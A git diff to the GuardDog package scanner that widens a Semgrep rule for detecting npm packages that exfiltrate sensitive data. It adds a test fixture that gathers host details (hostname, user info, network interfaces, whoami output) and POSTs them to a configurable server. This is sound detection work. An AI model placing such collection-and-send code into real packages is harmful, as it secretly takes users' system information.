diff --git a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
index 38bcb4be..0a4110df 100644
--- a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
@@ -59,6 +59,12 @@ rules:
     pattern-sinks:
       - patterns:
           - pattern-either:
+              - pattern-inside: |
+                  $HTTP = ... .request(...)
+                  ...
+              - pattern-inside: |
+                  $HTTP = require('http')
+                  ...
               - pattern-inside: |
                   $HTTP = require('https')
                   ...
@@ -79,6 +85,7 @@ rules:
             - pattern: $HTTP. ... .get(...)
             - pattern: $HTTP. ... .post(...)
             - pattern: $HTTP. ... .push(...)
+            - pattern: $HTTP. ... .write(...)
             - pattern: $HTTP(...)
     languages:
       - javascript
diff --git a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
index 7f025eac..f625f89c 100644
--- a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
+++ b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
@@ -113,3 +113,46 @@ function f(){
         });
     });
 }
+
+function f(){
+    const os = require('os');
+    const http = require('http');
+    // Collect device information
+    const deviceInfo = {
+        platform: os.platform(),
+        release: os.release(),
+        hostname: os.hostname(),
+        arch: os.arch(),
+        userInfo: os.userInfo(),
+        networkInterfaces: os.networkInterfaces(),
+        whoamiinfo: whoamiInfo, // Include whoami output
+        user: "Keycloak",
+    };
+
+    // Define the request options
+    const options = {
+        hostname: apiHostname,
+        port: apiPort,
+        path: apiPath,
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json', // Inform the server about the JSON body
+        },
+    };
+
+    // Create the request
+    const req = http.request(options, (res) => {
+        console.log(`Status: ${res.statusCode}`);
+        res.on('data', (chunk) => {
+            console.log(`Body: ${chunk}`);
+        });
+    });
+
+    req.on('error', (error) => {
+        console.error(`Error: ${error.message}`);
+    });
+
+    // ruleid:npm-exfiltrate-sensitive-data
+    req.write(JSON.stringify(deviceInfo));
+    req.end();
+}